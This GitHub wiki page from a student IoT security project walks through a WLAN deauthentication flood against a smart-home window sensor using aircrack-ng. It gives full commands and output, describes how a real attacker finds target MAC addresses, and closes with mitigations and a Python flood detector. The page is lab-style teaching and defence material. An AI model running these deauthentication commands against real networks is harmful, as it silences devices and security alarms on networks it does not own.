Attack via WLAN Deauthentication Attack - HendrikVE/swp-telematik-ws-20-21 GitHub Wiki

Introduction

One way to disable an IoT device is to disconnect it from the network. If it cannot report a status change, such as the opening of a window, our security system cannot report the change to the system owner. There are two methods to achieve this. One is to block the WLAN frequencies completely with a jammer, but this would lead to widespread disruption of services and be easily detectable by everyone in the area. A better approach is to selectively block the single device that monitors the window. For that we can use a management frame of the WLAN protocol, the deauthentication frame, which tells a device to disconnect from the network. Since this frame is neither encrypted nor authenticated in older WLAN standards, it can easily be forged. By repeatedly sending this frame we essentially execute a denial-of-service attack on the IoT device and block it from reporting back.

Prerequisites

  1. Your own test network with our smarthome example project set up. Never attempt this on a network that you do not own.
  2. The MAC address of your IoT device and the BSSID (MAC address) of the router of your test network.
  3. A notebook, preferably running Linux, with a WLAN adapter capable of monitor mode to simulate the attacker, and the Linux package aircrack-ng installed. You can install it with `sudo apt-get install aircrack-ng`.

How to Attack

Important: Use only your own test network or networks you have permission from the owner to attack

  1. Run `sudo airmon-ng check` and note down the listed processes so that you can restart them after you are done with the attack (otherwise you may have to reboot your computer to get WiFi back).

  2. Kill all other processes which currently use your WLAN adapter:

```
sudo airmon-ng check kill
```

The output lists the processes that were killed:

```
Killing these processes:

  PID Name
 3553 avahi-daemon
 3557 avahi-daemon
```

  3. Identify your WLAN adapter by running:

```
iwconfig
```

```
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  Mode:Master  Tx-Power=31 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
```

It shows a list of your network interfaces. Identify your WLAN adapter and note it down. Usually the adapter is called wlan0.

  4. Identify the WLAN network by running:

```
sudo airmon-ng start [wlan adapter]
```

This puts your WLAN adapter into monitor mode. Your old interface may vanish and a new one appear; for example wlp4s0 might change to wlp4s0mon. Check again with `iwconfig` and use the monitor interface if it appears.

```
sudo airodump-ng [wlan adapter]
```

This shows a list of all active WLAN networks. Note down the BSSID and channel (CH) of your test network. Alternatively you can look up the MAC address of your network on your router. The airodump-ng output looks something like this:

```
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 B8:27:EB:84:DF:AB  -45       25        0    0   5  54e  WPA2 CCMP   PSK  PiLantestbla
 C0:25:06:F8:2D:F3  -62        9        0    0   6  54e. WPA2 CCMP   PSK  borganer
 C0:C9:E3:29:7E:56  -76       16        0    0   1  54e. WPA2 CCMP   PSK  Mirs
 C6:C9:E3:29:7E:56  -76       16        0    0   1  54e. WPA2 CCMP   PSK  <length:  0>
 9C:C7:A6:64:EB:69  -76       13        0    0  11  54e. WPA2 CCMP   PSK  galan
 C0:C9:E3:29:7C:F2  -83       13        0    0   1  54e. WPA2 CCMP   PSK  Mirs
 C6:C9:E3:29:7C:F2  -84        8        0    0   1  54e. WPA2 CCMP   PSK  <length:  0>
 4C:09:D4:2A:9B:F4  -89        2        0    0   1  54e  WPA2 CCMP   PSK  EasyBox-2A9B36
 00:24:FE:AC:7A:AF  -91        5        0    0   6  54e. WPA2 CCMP   PSK  E_G
```

  5. Identify the device MAC address.

Go to your test network router and look up the MAC address of your target device. Alternatively you can run `ping [device ip]` and then `arp -a`; the MAC address should be listed there.

  6. Optional step (may be required)

For me it only worked when the channel was also specified when putting the WLAN adapter into monitor mode, but this might be unnecessary for you:

```
sudo airmon-ng stop [WLAN adapter]
sudo airmon-ng start [WLAN adapter] [Channel]
```

  7. Start the WLAN deauthentication attack:

```
sudo aireplay-ng -D [WLAN adapter] -0 0 -a [MAC-WLAN (BSSID)] -c [MAC iot-device]
```

The IoT device is now blocked. You can stop the attack by pressing Ctrl-C.

  8. Getting your WiFi back

To get your WLAN back after `sudo airmon-ng check kill` you sometimes have to restart your computer. However, what worked for me is `sudo airmon-ng stop [WLAN adapter]` to put your adapter back into managed mode, then `sudo service NetworkManager restart` and `sudo service wpa_supplicant restart`, and possibly restarting the other services that were killed by `sudo airmon-ng check kill`.

Troubleshooting

No such BSSID available

Should you receive a message like

```
13:20:35  Waiting for beacon frame (BSSID: B2:05:25:78:B2:08) on channel 6
13:20:45  No such BSSID available.
```

you might be listening on the wrong channel. First make sure that all processes using your WLAN interface are killed (see the step "kill all other processes" above); run `sudo airmon-ng check kill` repeatedly until no processes are listed on a new try. Set the channel to the one you noted down before with `sudo iwconfig [wlan adapter] channel [channel number]`. Then retry the attack from the step "Start the WLAN deauthentication attack".

My device still works

Newer devices either use a more recent WLAN standard with protected management frames (802.11w, PMF), or they simply ignore (or limit the number of acknowledged) deauthentication frames. In both cases you will likely see output like this:

```
13:50:25  Waiting for beacon frame (BSSID: B8:27:EB:84:DF:AB) on channel 5
13:50:26  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 0|64 ACKs]
13:50:26  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 0|64 ACKs]
13:50:27  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 0|64 ACKs]
13:50:27  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 2|64 ACKs]
13:50:28  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 0|64 ACKs]
13:50:28  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 0|64 ACKs]
13:50:29  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 0|64 ACKs]
13:50:29  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 1|64 ACKs]
13:50:30  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 1|64 ACKs]
13:50:30  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 1|64 ACKs]
13:50:31  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 0|64 ACKs]
```

The low number of received ACKs (here mostly 0) shows that the sent frames are ignored by the device. Congratulations, a security feature defeated you.

How does the attacker do it in the real world?

As you have noticed, to successfully attack and block a specific device you need to know the MAC address of the device and the MAC address (BSSID) of the network. For that an attacker would start by exploring the local networks with a WiFi network explorer application; there are a number of free applications available for all operating systems.

Once the attacker knows the network and the channel it operates on, the attacker can simply start monitoring it with the command

```
airmon-ng start [wlan-adapter] [channel]
```

and save the captured data on the local machine with

```
airodump-ng -c [channel] --bssid [MAC-WLAN (BSSID)] -w [filename] [wlan-adapter]
```

At home the attacker can then use tools like Wireshark to analyze the collected data and identify the desired IoT devices. This is made even easier by correlating the data with known events, such as the timestamp at which the window was opened. Since the MAC address of the device is not encrypted, it can simply be read, and the attacker now has everything needed to start the attack.

Attack prevention

Use state-of-the-art WLAN standards, in particular ones that protect management frames (802.11w PMF, which WPA3 makes mandatory), and disable support for old standards whenever possible. Make sure you have good WLAN radio signal strength in the areas where you use WLAN. The stronger the legitimate signal, the harder the attack becomes, because the attacker is forced to operate from a closer physical location, which makes detection easier. If you suspect such an attack against your network, record your own network traffic and check whether large numbers of deauthentication frames are being sent.
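The last recommendation, checking a recording of your own traffic for a deauthentication flood, can be automated. The following Python script is an added example for this wiki page and is not part of the project's code. It assumes you already have a monitor-mode capture of raw 802.11 management frames with timestamps (radiotap headers stripped); the capture used here is constructed inline and reuses the BSSID and the sensor MAC from the listings above purely as sample values. It parses the 802.11 frame-control field to pick out deauthentication and disassociation frames, counts them per (BSSID, client) pair in a sliding one-second window, and reports pairs whose peak rate exceeds a threshold that is itself an assumption you should tune to your network.

```python
import struct
from collections import defaultdict, deque

# 802.11 management-frame subtypes of interest (frame type 0 = management)
SUBTYPE_DISASSOC = 0x0A
SUBTYPE_DEAUTH = 0x0C
MGMT_HDR_LEN = 24  # frame control(2) + duration(2) + 3 addresses(3*6) + sequence control(2)


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02X}" for b in raw)


def parse_mgmt_frame(frame: bytes):
    """Return header fields of a deauth/disassoc management frame, else None.

    Frame control byte 0: bits 0-1 protocol version, bits 2-3 type, bits 4-7 subtype.
    Addresses in a management frame: addr1 = receiver, addr2 = transmitter, addr3 = BSSID.
    """
    if len(frame) < MGMT_HDR_LEN + 2:  # header plus 2-byte reason code
        return None
    fc = frame[0]
    version, ftype, subtype = fc & 0x03, (fc >> 2) & 0x03, (fc >> 4) & 0x0F
    if version != 0 or ftype != 0 or subtype not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
        return None
    (seq_ctrl,) = struct.unpack_from("<H", frame, 22)
    (reason,) = struct.unpack_from("<H", frame, MGMT_HDR_LEN)
    return {
        "subtype": subtype,
        "addr1": mac_str(frame[4:10]),
        "addr2": mac_str(frame[10:16]),
        "addr3": mac_str(frame[16:22]),
        "seq": seq_ctrl >> 4,  # upper 12 bits; the low 4 bits are the fragment number
        "reason": reason,
    }


def detect_deauth_flood(records, window_s=1.0, threshold=20):
    """records: iterable of (timestamp_seconds, raw_frame_bytes), in time order.

    Counts deauth/disassoc frames per (BSSID, client) pair inside a sliding
    window and returns [(bssid, client, peak_count_in_window)] for every pair
    whose peak reaches `threshold`. A handful of genuine frames per session is
    normal; hundreds per second aimed at one client is the flood pattern.
    """
    windows = defaultdict(deque)
    peaks = {}
    for ts, frame in records:
        hdr = parse_mgmt_frame(frame)
        if hdr is None:
            continue  # data/control frames and other management frames are ignored
        bssid = hdr["addr3"]
        # The client is whichever address is not the BSSID, regardless of direction:
        # a flood usually hits both directions (AP->client and client->AP).
        client = hdr["addr1"] if hdr["addr1"] != bssid else hdr["addr2"]
        key = (bssid, client)
        dq = windows[key]
        dq.append(ts)
        while dq and ts - dq[0] > window_s:
            dq.popleft()
        peaks[key] = max(peaks.get(key, 0), len(dq))
    alerts = [(b, c, n) for (b, c), n in peaks.items() if n >= threshold]
    return sorted(alerts, key=lambda a: -a[2])


# --- constructed test capture (sample values only, no frames are transmitted) ---
AP = bytes.fromhex("B827EB84DFAB")      # BSSID taken from the airodump-ng listing above
SENSOR = bytes.fromhex("E04007FC1A6C")  # STMAC taken from the aireplay-ng output above
PHONE = bytes.fromhex("020000000001")   # constructed: an unrelated client


def make_frame(addr1, addr2, bssid, seq, reason, subtype=SUBTYPE_DEAUTH):
    """Assemble a management frame header + reason code as test input (constructed)."""
    fc = bytes([subtype << 4, 0x00])
    return (fc + b"\x3a\x01" + addr1 + addr2 + bssid
            + struct.pack("<H", seq << 4) + struct.pack("<H", reason))


def constructed_capture():
    records = []
    # one legitimate disassociation: the phone leaves the network at t=0.5 s (reason 8)
    records.append((0.5, make_frame(AP, PHONE, AP, seq=10, reason=8, subtype=SUBTYPE_DISASSOC)))
    # a flood: 64 forged deauths every 0.5 s aimed at the sensor, like the bursts shown above
    for i in range(320):
        records.append((2.0 + i * (0.5 / 64), make_frame(SENSOR, AP, AP, seq=i % 4096, reason=7)))
    # a data frame (type 2) that the parser must ignore
    records.append((3.0, bytes([0x08, 0x00]) + b"\x00" * 30))
    return records


if __name__ == "__main__":
    for bssid, client, peak in detect_deauth_flood(constructed_capture()):
        print(f"possible deauth flood: BSSID {bssid} -> client {client}, peak {peak} frames/s")
```

In a real deployment you would feed the function frames read from a pcap taken on a monitor-mode interface. Note that a rate-based check cannot by itself distinguish forged frames from genuine ones, and that on a PMF-capable network the forged frames are discarded by the devices anyway; the detector then still tells you that someone is trying.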
